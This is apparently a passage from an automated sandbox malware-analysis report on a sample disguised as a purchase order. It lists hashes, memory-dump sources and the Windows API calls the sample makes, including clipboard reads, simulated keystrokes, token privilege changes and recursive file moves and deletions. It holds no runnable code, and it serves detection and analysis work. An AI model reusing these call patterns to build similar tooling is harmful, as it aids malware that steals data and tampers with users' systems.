                                                                                                              • Instruction ID: 6ab40a03f288fca368ad431fd61b777cb6a30e832f66fcf0fc8d044948a39420
                                                                                                              • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                                              • Instruction Fuzzy Hash: 0301A93150014DAFCF05EFA5C8818FFBB78EF15304F00812AB512971E5EA309A49DF64
                                                                                                              APIs
                                                                                                              • __lock_file.LIBCMT ref: 00402AED
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd_noexit__lock_file
                                                                                                              • String ID:
                                                                                                              • API String ID: 2597487223-0
                                                                                                              • Opcode ID: c095124b8e52681dc6a46ac3668420dc1eda8e458ebe733520907f5bf8e75aa4
                                                                                                              • Instruction ID: 2ae8e173640a3ee3ac10b9bfec3d5d33a1304714562b88bdf4c4cdd9a61f7d91
                                                                                                              • Opcode Fuzzy Hash: c095124b8e52681dc6a46ac3668420dc1eda8e458ebe733520907f5bf8e75aa4
                                                                                                              • Instruction Fuzzy Hash: A8F0C83160020596DF21BF66CD0A39F3AA57F40324F15443BB410BA1D1DBBC8962DF89
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,003E39FE,?,00000001), ref: 003E4286
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeLibrary
                                                                                                              • String ID:
                                                                                                              • API String ID: 3664257935-0
                                                                                                              • Opcode ID: 6078736898da431ee74d425bc2410dfb8ce569087993a51d8e2dbcad8a25275d
                                                                                                              • Instruction ID: 029aef5d0125df8b6ece8c77d5a75440511caff0baa8741b805214aa7d8d9f35
                                                                                                              • Opcode Fuzzy Hash: 6078736898da431ee74d425bc2410dfb8ce569087993a51d8e2dbcad8a25275d
                                                                                                              • Instruction Fuzzy Hash: 47F08C70904361CFCB358F62D884812BBF4AF083153218F7EF2C682550C3719840CB40
                                                                                                              APIs
                                                                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003E40C6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LongNamePath
                                                                                                              • String ID:
                                                                                                              • API String ID: 82841172-0
                                                                                                              • Opcode ID: 52ff0fcf01b0a84ace1dc718e1ddcb8ca22e084b388949580f433044bac8d9e9
                                                                                                              • Instruction ID: ea6ce1244c5280c91ab99da5d38641d5f5c9aa7d033bd9b0ff12816fd7e3b1d5
                                                                                                              • Opcode Fuzzy Hash: 52ff0fcf01b0a84ace1dc718e1ddcb8ca22e084b388949580f433044bac8d9e9
                                                                                                              • Instruction Fuzzy Hash: CDE07D33A001241BC711A255CC42FEE339CDF88690F050075F904E7244DAB499808690
                                                                                                              APIs
                                                                                                              • Sleep.KERNELBASE(000001F4), ref: 00D78251
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2063345059.0000000000D76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D76000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_d76000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 3472027048-0
                                                                                                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                              • Instruction ID: 5de52e42697991b67cd66f441d2fd34460b193a0cfbdb6f74db05d907ed798ad
                                                                                                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                              • Instruction Fuzzy Hash: 62E04F3498010DEFCB00EFA8D54D6DE7BB4EF00302F1005A0FD06D3680DB309E508A62
                                                                                                              APIs
                                                                                                              • Sleep.KERNELBASE(000001F4), ref: 00D78251
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2063345059.0000000000D76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D76000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_d76000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 3472027048-0
                                                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                              • Instruction ID: 6af6294524e0dabf5bd0adb0e830011e7e805160ac153297260bf322d238070d
                                                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                              • Instruction Fuzzy Hash: 06E0BF7498410D9FDB00EFA8D54969E7BB4EF04302F104161FD0692281DA3099509A62
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
                                                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0044F87D
                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0044F8DC
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0044F919
                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0044F940
                                                                                                              • SendMessageW.USER32 ref: 0044F966
                                                                                                              • _wcsncpy.LIBCMT ref: 0044F9D2
                                                                                                              • GetKeyState.USER32(00000011), ref: 0044F9F3
                                                                                                              • GetKeyState.USER32(00000009), ref: 0044FA00
                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0044FA16
                                                                                                              • GetKeyState.USER32(00000010), ref: 0044FA20
                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0044FA4F
                                                                                                              • SendMessageW.USER32 ref: 0044FA72
                                                                                                              • SendMessageW.USER32(?,00001030,?,0044E059), ref: 0044FB6F
                                                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0044FB85
                                                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0044FB96
                                                                                                              • SetCapture.USER32(?), ref: 0044FB9F
                                                                                                              • ClientToScreen.USER32(?,?), ref: 0044FC03
                                                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0044FC0F
                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0044FC29
                                                                                                              • ReleaseCapture.USER32 ref: 0044FC34
                                                                                                              • GetCursorPos.USER32(?), ref: 0044FC69
                                                                                                              • ScreenToClient.USER32(?,?), ref: 0044FC76
                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0044FCD8
                                                                                                              • SendMessageW.USER32 ref: 0044FD02
                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0044FD41
                                                                                                              • SendMessageW.USER32 ref: 0044FD6C
                                                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0044FD84
                                                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0044FD8F
                                                                                                              • GetCursorPos.USER32(?), ref: 0044FDB0
                                                                                                              • ScreenToClient.USER32(?,?), ref: 0044FDBD
                                                                                                              • GetParent.USER32(?), ref: 0044FDD9
                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0044FE3F
                                                                                                              • SendMessageW.USER32 ref: 0044FE6F
                                                                                                              • ClientToScreen.USER32(?,?), ref: 0044FEC5
                                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0044FEF1
                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0044FF19
                                                                                                              • SendMessageW.USER32 ref: 0044FF3C
                                                                                                              • ClientToScreen.USER32(?,?), ref: 0044FF86
                                                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0044FFB6
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0045004B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                              • String ID: @GUI_DRAGID$F
                                                                                                              • API String ID: 2516578528-4164748364
                                                                                                              • Opcode ID: abfd9640e1474f06387be19a9438225666d7f1b0479da2e3d717cfbfe2c7e045
                                                                                                              • Instruction ID: cc3fe950eff1dae800439dc52d192c564c00beaa656830a60161b96da3a91d0b
                                                                                                              • Opcode Fuzzy Hash: abfd9640e1474f06387be19a9438225666d7f1b0479da2e3d717cfbfe2c7e045
                                                                                                              • Instruction Fuzzy Hash: 7732A974A04244AFEB10DF24CC84BABBBE4BF49354F14062AF6958B2B1D775DC09CB5A
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0044B1CD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID: %d/%02d/%02d
                                                                                                              • API String ID: 3850602802-328681919
                                                                                                              • Opcode ID: c97614ef08484f9b39b63f5ea60a2fc20308e4f183716ad12c81f533a892ca50
                                                                                                              • Instruction ID: 5282338976ea382dc038b7ba62d4f45d4417dfec049b689320bc04dd75ef99cc
                                                                                                              • Opcode Fuzzy Hash: c97614ef08484f9b39b63f5ea60a2fc20308e4f183716ad12c81f533a892ca50
                                                                                                              • Instruction Fuzzy Hash: AB12C271A40218ABFB258F65CC49FAB7BB8FF45310F10412AF916DB2D1DB789901CB5A
                                                                                                              APIs
                                                                                                              • GetForegroundWindow.USER32(00000000,00000000), ref: 003FEB4A
                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00453AEA
                                                                                                              • IsIconic.USER32(000000FF), ref: 00453AF3
                                                                                                              • ShowWindow.USER32(000000FF,00000009), ref: 00453B00
                                                                                                              • SetForegroundWindow.USER32(000000FF), ref: 00453B0A
                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00453B20
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00453B27
                                                                                                              • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00453B33
                                                                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00453B44
                                                                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00453B4C
                                                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00453B54
                                                                                                              • SetForegroundWindow.USER32(000000FF), ref: 00453B57
                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00453B6C
                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00453B77
                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00453B81
                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00453B86
                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00453B8F
                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00453B94
                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00453B9E
                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00453BA3
                                                                                                              • SetForegroundWindow.USER32(000000FF), ref: 00453BA6
                                                                                                              • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00453BCD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                              • String ID: Shell_TrayWnd
                                                                                                              • API String ID: 4125248594-2988720461
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0041B180
                                                                                                                • Part of subcall function 0041B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0041B1AD
                                                                                                                • Part of subcall function 0041B134: GetLastError.KERNEL32 ref: 0041B1BA
                                                                                                              • _memset.LIBCMT ref: 0041AD08
                                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0041AD5A
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0041AD6B
                                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0041AD82
                                                                                                              • GetProcessWindowStation.USER32 ref: 0041AD9B
                                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 0041ADA5
                                                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0041ADBF
                                                                                                                • Part of subcall function 0041AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0041ACC0), ref: 0041AB99
                                                                                                                • Part of subcall function 0041AB84: CloseHandle.KERNEL32(?,?,0041ACC0), ref: 0041ABAB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                              • String ID: $H*I$default$winsta0
                                                                                                              • API String ID: 2063423040-1865604469
                                                                                                              APIs
                                                                                                                • Part of subcall function 00426EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00425FA6,?), ref: 00426ED8
                                                                                                                • Part of subcall function 00426EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00425FA6,?), ref: 00426EF1
                                                                                                                • Part of subcall function 0042725E: __wsplitpath.LIBCMT ref: 0042727B
                                                                                                                • Part of subcall function 0042725E: __wsplitpath.LIBCMT ref: 0042728E
                                                                                                                • Part of subcall function 004272CB: GetFileAttributesW.KERNEL32(?,00426019), ref: 004272CC
                                                                                                              • _wcscat.LIBCMT ref: 00426149
                                                                                                              • _wcscat.LIBCMT ref: 00426167
                                                                                                              • __wsplitpath.LIBCMT ref: 0042618E
                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004261A4
                                                                                                              • _wcscpy.LIBCMT ref: 00426209
                                                                                                              • _wcscat.LIBCMT ref: 0042621C
                                                                                                              • _wcscat.LIBCMT ref: 0042622F
                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0042625D
                                                                                                              • DeleteFileW.KERNEL32(?), ref: 0042626E
                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00426289
                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00426298
                                                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 004262AD
                                                                                                              • DeleteFileW.KERNEL32(?), ref: 004262BE
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 004262E1
                                                                                                              • FindClose.KERNEL32(00000000), ref: 004262FD
                                                                                                              • FindClose.KERNEL32(00000000), ref: 0042630B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                                              • String ID: \*.*
                                                                                                              • API String ID: 1917200108-1173974218
                                                                                                              APIs
                                                                                                              • OpenClipboard.USER32(0047DC00), ref: 00436B36
                                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00436B44
                                                                                                              • GetClipboardData.USER32(0000000D), ref: 00436B4C
                                                                                                              • CloseClipboard.USER32 ref: 00436B58
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00436B74
                                                                                                              • CloseClipboard.USER32 ref: 00436B7E
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00436B93
                                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00436BA0
                                                                                                              • GetClipboardData.USER32(00000001), ref: 00436BA8
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00436BB5
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00436BE9
                                                                                                              • CloseClipboard.USER32 ref: 00436CF6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 3222323430-0
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0042F62B
                                                                                                              • FindClose.KERNEL32(00000000), ref: 0042F67F
                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042F6A4
                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042F6BB
                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0042F6E2
                                                                                                              • __swprintf.LIBCMT ref: 0042F72E
                                                                                                              • __swprintf.LIBCMT ref: 0042F767
                                                                                                              • __swprintf.LIBCMT ref: 0042F7BB
                                                                                                                • Part of subcall function 0040172B: __woutput_l.LIBCMT ref: 00401784
                                                                                                              • __swprintf.LIBCMT ref: 0042F809
                                                                                                              • __swprintf.LIBCMT ref: 0042F858
                                                                                                              • __swprintf.LIBCMT ref: 0042F8A7
                                                                                                              • __swprintf.LIBCMT ref: 0042F8F6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                              • API String ID: 835046349-2428617273
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00431B50
                                                                                                              • _wcscmp.LIBCMT ref: 00431B65
                                                                                                              • _wcscmp.LIBCMT ref: 00431B7C
                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00431B8E
                                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00431BA8
                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00431BC0
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431BCB
                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00431BE7
                                                                                                              • _wcscmp.LIBCMT ref: 00431C0E
                                                                                                              • _wcscmp.LIBCMT ref: 00431C25
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00431C37
                                                                                                              • SetCurrentDirectoryW.KERNEL32(004939FC), ref: 00431C55
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431C5F
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431C6C
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431C7C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                              • String ID: *.*
                                                                                                              • API String ID: 1803514871-438819550
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00431CAB
                                                                                                              • _wcscmp.LIBCMT ref: 00431CC0
                                                                                                              • _wcscmp.LIBCMT ref: 00431CD7
                                                                                                                • Part of subcall function 00426BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00426BEF
                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00431D06
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431D11
                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00431D2D
                                                                                                              • _wcscmp.LIBCMT ref: 00431D54
                                                                                                              • _wcscmp.LIBCMT ref: 00431D6B
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00431D7D
                                                                                                              • SetCurrentDirectoryW.KERNEL32(004939FC), ref: 00431D9B
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431DA5
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431DB2
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431DC2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                              • String ID: *.*
                                                                                                              • API String ID: 1824444939-438819550
